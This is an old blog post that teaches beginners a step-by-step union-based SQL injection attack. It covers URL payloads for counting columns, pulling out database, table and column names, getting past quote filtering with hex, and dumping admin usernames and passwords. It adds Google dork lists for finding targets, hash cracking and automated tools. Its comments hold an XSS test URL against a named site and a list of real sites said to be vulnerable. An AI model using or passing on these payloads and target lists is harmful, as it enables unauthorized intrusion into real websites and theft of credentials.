Thursday, 17 January 2013

SQL Injection


If you are crazy about hacking here I'm going to tell you about a simplest hacking procedure called The SQL Injection...
  SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...!

"SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".

So what you need to do that...?

You need to find vulnerable sites manually by using some Google Droks


Checking for vulnerability:



Step1:
 In order to check if a site is vulnerable to SQL injection, just put a ' in the end of the url like this:

http://www.examplesite.com/index.php?id=5'
If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.

You may get Like this on the webpage:

Warning: mssql_execute(): message: Error converting data type varchar to int. (severity 16) in /var/www/html/includes/dbconnect.class.php on line 59

In order to successfully extract information from the database we need to do a few things, so it might be a good idea to open a text document so you can write stuff down. 



Step2:
 First we need to find out how many columns there is in the database. To do so we will use this query (a trial and error method):

http://www.examplesite.com/index.php?id=5 order by 1--

And we will keep increasing the number until we get an error.

http://www.examplesite.com/index.php?id=5 order by 5--
http://www.examplesite.com/index.php?id=5 order by 10--
Lets say there is 10 columns in the database.



Step3:
 Now we need to find out which columns that are vulnerable to SQL injection. To do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--

Notice that I have put a single - in front of the id number (id=-5)
Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.



Step4:
 Now we wanna find the version of the database. To do so we will use this query (in either 1 of the vulnerable tables but i chose 3 for this example)

http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
And if that doesn't work then try this 1:
http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--





Step5:
 Now we want to get the name of the database for later usage, to do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--

Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )



Step6:
If the version is 5 or above then we will use this query to show all the tables:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


You don't have to group concatenate the output here. These queries would work as well

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Now you have the table names! 


Now you need to look at those tables and see if you can spot some tables we know has good information in it, tables such as:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Of course the admin might not have given the table such an obvious name so you might have to look around about it.




Step7:
 Once you have found the table you think has the information you want, we will use this query (In this example i use admin):

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--

If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.

To do this:
Copy the name of the table you are trying to access, visit the site
Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this.

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--

Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.



Step8:
 Now, once again you will have to spot the columns we wanna see the contents of (although it is hopefully easier this time)
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--

this is where we needed the database name. Btw the 0x3a means colon ( : )

Now you have the admin login!

If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked


And now we have to find the admin login, to do so, once again you can use
Google Droks to search for it manually

example :

inurl:adminlogin.php
inurl:admin.aspx
etc etc. 


and now check out for the Administrators Login and enjoy the Hack Trip...!

In the end:
   Feels lazy in typing each and every sql query in the address bar...?
    Don't worry even you 2 can enjoy this hack trip, just use Havij  or SQL Poizon they are the GUI   Hack tools for you lazy guy...!

His not the end here I'm providing you a link that contains list of rich Google Droks and they are personally tested by me hi you can use is for XSS and for SQL Injection....
some popular Droks:-

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
For some more... download Google_Droks.rtf

 Hi but be aware of log files of the websites as they always track your actions and I'm not responsible in case you are in trouble..., as this is just a game and always maintain Anonymity on Web

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."


Add to Google Technology Blogs
Blog search
indiae.in
we are in
Make money Paisa Live
Like us on Facebook

4 comments:

  1. Being a grey hat hckr I like it..., continue ur work as it helps d beginners...!
    I suggest u 2 write abt XSS attacks in ur next post.., refer my new experiment here
    http://www.gamakatsu.com/search.php?q=%3CIMG%20SRC=%22http://4.bp.blogspot.com/_ycMde43Wqe0/TPwAAuG3KKI/AAAAAAAACZA/q_skTl7RBrw/s1600/hr_The_Walking_Dead.jpg%22%3E

    ReplyDelete
    Replies
    1. Well..., thanks 4 that. :)
      I need to state that I'm not a hacker, I'm just an Individual who loves internet technology.
      And I also want to say that I share what I know and I'll do it.
      Finally I think you are just a new born & not a grey hat...!

      Delete
  2. This is really cool I love SQL Injection...!
    Hi dude Sriharsha CR tell us some more hacking tricks & what's next after SQL injection...? XSS or something other...? waiting 4 new posting...!

    ReplyDelete
  3. Latest SQL Vulnerable sites 05 SEPT 2014:

    http://www.irishsanghatrust.ie/news.php?id=33'
    http://www.calidus.ro/en/news.php?id=2'
    http://www.police.gov.bd/content.php?id=275'
    http://www.cobranet.org/about.php?id=1'
    http://www.karnaticlabrecords.com/cart.php?id=88'
    http://www.retromoderndesign.com/sold.php?id=9'

    ReplyDelete

Featured post

Common Errors in English

Although English is a foreign language yet its important to learn in our country, If you needs to survive just out of your state now En...